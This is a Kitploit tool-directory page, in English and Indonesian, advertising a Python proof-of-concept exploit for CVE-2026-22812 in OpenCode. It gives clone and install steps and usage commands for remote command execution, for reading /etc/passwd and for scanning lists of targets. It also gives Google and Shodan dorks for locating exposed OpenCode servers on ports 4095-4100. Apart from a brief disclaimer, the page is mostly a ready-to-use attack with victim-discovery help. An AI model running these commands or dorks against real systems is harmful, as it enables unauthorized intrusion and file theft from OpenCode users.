Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-22812-POC — Python tool to check and exploit CVE-2026-22812 in OpenCode, supporting command execution, file read, and multi-target scanning on ports 4095-4100. | Kitploit
Tools/GitHubGitHub/caybermods/cve-2026-22812-poc
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubcaybermods/cve-2026-22812-poc

CVE-2026-22812-POC

Python tool to check and exploit CVE-2026-22812 in OpenCode, supporting command execution, file read, and multi-target scanning on ports 4095-4100.

View Repository
17 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

OpenCode CVE-2026-22812 Exploiter Simple Python tols to check and exploit OpenCode vulnerability (CVE-2026-22812).

Install

root@kitploit:~
git clone https://github.com/CayberMods/CVE-2026-22812-POC.git
cd CVE-2026-22812-POC
pip install requests urllib3 argparse concurrent-log-handler colorama

Basic Usage

root@kitploit:~
# Check single target
python rce.py -u http://target:4096 --check
# Execute command
python rce.py -u http://target:4096 -c "whoami"
# Read file
python rce.py -u http://target:4096 --read-file /etc/passwd
# Scan multiple targets
python rce.py -l targets.txt --check
# Other
python rce.py --help

Search Dorks

Google: intitle:"OpenCode" "Login"

Shodan: port:"4095-4100" http.component:"OpenCode"

Default Ports: 4095-4100

Disclaimer For educational/authorized testing only.

Tols Python sederhana untuk cek dan eksploit kerentanan OpenCode (CVE-2026-22812).

Instalasi:

root@kitploit:~
git clone https://github.com/CayberMods/CVE-2026-22812-POC.git
cd CVE-2026-22812-POC
pip install requests urllib3 argparse concurrent-log-handler colorama

Penggunaan Dasar

root@kitploit:~
# Cek target tunggal
python rce.py -u http://target:4096 --check
# Eksekusi perintah
python rce.py -u http://target:4096 -c "whoami"
# Baca file
python rce.py -u http://target:4096 --read-file /etc/passwd
# Scan banyak target
python rce.py -l targets.txt --check
# Lainnya

Dork Pencarian:

Google: intitle:"OpenCode" "Login"

Shodan: port:"4095-4100" http.component:"OpenCode"

Port Default: 4095-4100

Catatan Hanya untuk testing edukasi/terotorisasi.

Download Tool